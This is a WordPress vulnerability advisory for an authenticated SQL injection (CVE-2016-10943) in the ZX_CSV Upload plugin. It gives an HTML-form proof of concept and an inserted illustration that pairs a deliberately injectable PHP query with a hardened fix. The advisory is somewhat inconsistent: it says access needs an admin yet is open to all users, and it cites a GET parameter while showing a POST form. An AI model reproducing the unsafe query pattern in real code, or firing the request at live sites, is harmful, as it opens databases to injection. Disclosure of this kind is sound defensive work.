ZX_CSV Upload 1 – Authenticated SQL Injection



Description
User access type: admin user.

$_GET['id'] is not escaped. The URL is accessible to every registered user.
Proof of Concept
1 – Log in as an admin user.

2 – Send the following POST request:

<form action="http://www.example.com/wp-admin/admin.php?page=zx_csv_plugin_home" method="post">
    <input type="text" name="rsltsbmt" value="a">
    <input type="text" name="table_select" value="wp_terms">
    <input type="text" name="rsltfrom" value="0">
    <input type="text" name="rsltto" value="10">
    <input type="submit" name="">
</form>
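The defect class the description names (an unescaped request parameter dropped into SQL on a page that any logged-in user can reach) and its hardened counterpart, shown here as an added illustration. This is not code from the ZX_CSV Upload plugin; the zx_demo_* function names, the nonce action name and the query shape are assumptions chosen to match the parameters in the PoC form.

```php
<?php
/*
 * Added illustration only; not code from the ZX_CSV Upload plugin.
 * The zx_demo_* names, the nonce action and the query shape are hypothetical.
 */

// Vulnerable pattern (the defect class in the description): a request
// parameter is concatenated straight into SQL, and nothing restricts who
// can reach the page beyond being logged in.
function zx_demo_query_unsafe() {
    global $wpdb;
    $id = $_GET['id'];   // untrusted and unescaped
    return $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}terms WHERE term_id = $id" );
}

// Hardened counterpart for the same request shape as the PoC form
// (table_select, rsltfrom, rsltto): capability check, nonce check,
// allow-listed table identifier, and integer parameters bound with
// $wpdb->prepare().
function zx_demo_query_safe() {
    global $wpdb;

    // Only administrators should reach this page, not every registered user.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }

    // Reject posts that did not originate from the plugin's own form.
    check_admin_referer( 'zx_demo_action' );

    // prepare() cannot bind identifiers, so the table name must come from
    // a fixed allow-list rather than from the request.
    $allowed_tables = array( 'terms', 'posts' );
    $table = isset( $_POST['table_select'] ) ? sanitize_key( $_POST['table_select'] ) : '';
    if ( ! in_array( $table, $allowed_tables, true ) ) {
        return array();
    }
    $table = $wpdb->prefix . $table;

    // Range values are coerced to non-negative integers and bound with %d.
    $from  = isset( $_POST['rsltfrom'] ) ? absint( $_POST['rsltfrom'] ) : 0;
    $to    = isset( $_POST['rsltto'] )   ? absint( $_POST['rsltto'] )   : 0;
    $count = max( 0, $to - $from );

    return $wpdb->get_results(
        $wpdb->prepare( "SELECT * FROM `{$table}` LIMIT %d, %d", $from, $count )
    );
}
```

The two changes that matter for this advisory are the capability check, which closes the "accessible to every registered user" path, and moving every request value either through `prepare()` placeholders or through an allow-list; identifiers such as table names cannot be parameterised, which is why `table_select` is matched against a fixed list instead of being escaped.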

Affects Plugin

References

CVE 2016-10943
URL http://lenonleite.com.br/en/blog/2016/12/16/english-zx_csv-upload-1-plugin-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 5309
Verified Yes
WPVDB ID 8702

Timeline

Publicly Published 2016-12-12 (almost 3 years ago)
Added 2016-12-20 (almost 3 years ago)
Last Updated 2019-09-14 (about 1 month ago)
